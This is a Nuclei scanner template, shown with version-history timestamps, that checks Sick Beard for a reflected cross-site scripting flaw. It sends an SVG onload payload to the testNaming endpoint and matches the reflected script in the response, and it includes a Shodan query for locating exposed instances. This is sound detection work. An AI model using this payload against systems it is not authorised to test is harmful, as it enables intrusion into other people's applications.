nuclei-templates/vulnerabilities/other/sick-beard-xss.yaml

30 lines
675 B
YAML
Raw Normal View History

2020-08-28 20:55:56 +00:00
id: sick-beard-xss
info:
2020-08-28 21:03:17 +00:00
name: Sick Beard XSS
2020-08-28 20:55:56 +00:00
author: pikpikcu
severity: medium
reference:
- https://sickbeard.com/ # vendor homepage
- https://github.com/midgetspy/Sick-Beard # software link
2021-09-16 15:54:33 +00:00
metadata:
2021-10-22 17:53:25 +00:00
shodan-query: sickbeard
tags: xss
2020-08-28 20:55:56 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E"
2020-08-28 20:55:56 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <svg/onload=alert(document.domain)>
part: body
- type: word
words:
- "text/html"
part: header